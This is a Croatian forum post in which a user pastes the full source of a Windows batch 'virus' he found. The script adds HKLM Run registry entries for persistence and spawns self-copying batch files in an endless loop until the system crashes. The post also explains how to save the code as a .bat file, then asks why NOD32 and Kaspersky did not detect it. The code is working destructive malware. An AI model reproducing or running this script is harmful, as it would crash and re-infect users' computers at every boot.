Ovako malo sam surfao internet i trazio viruse da ih skinem:-) i da provjerim svoj nod32 i nabasao na jedan.
Stavit cu ovdje njegov kod:
--------------------------------------------------------
@echo off
del C:\1.reg
>>"C:\1.reg" ECHO Windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autoexec"="c:\\windows\\3.bat"
regedit.exe /s C:\1.reg
>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1
start C:\2.bat
-----------------------------------------------------------------
Ovo unutar linija se treba spremit pomocu Notepada ili bilo kojeg tekst procesora negdje na disk a sam naziv treba imati nastavak .bat.
Sad mene zanima kad sam ja stvorio taj virus na racunalo nod32 me nije nista upozorio a legalan je i updatan. Poslao sam i taj stvoren virus na kaspersky-ev online skener i on nije nista nasao. Uglavnom kad sam pokrenuo (dobrovoljno, zvuci malo glupo al sta je tu je) taj virus, on je poceo umnozavat nekakve prozore te na kraju srusio cjeli sistem. Nakon ponovnog pokretanja dogodila se ista stvar. Ja sam ga lagano izbrisao iz safe moda (rasiro je po raznim direktorijima svoje krake te se zapisao u start up). Međutim mene zanima ako je to virus a ocito neka vrsta malicioznog koda jest zasto ga nod32 ili kaspersky nisu kao takvog svrstavali?
Uput da upozorim korisnike ako nisu vjesti sa brisanje virusa rucno neka ne stvaraju taj virus kao ja:))
P.S.
I da, jel neko vidi iz ovog koje je sve datoteke virus stvorio na mom racunalu i gdje su locirane, za svaki slucaj ako ih nisam sve izbrisao.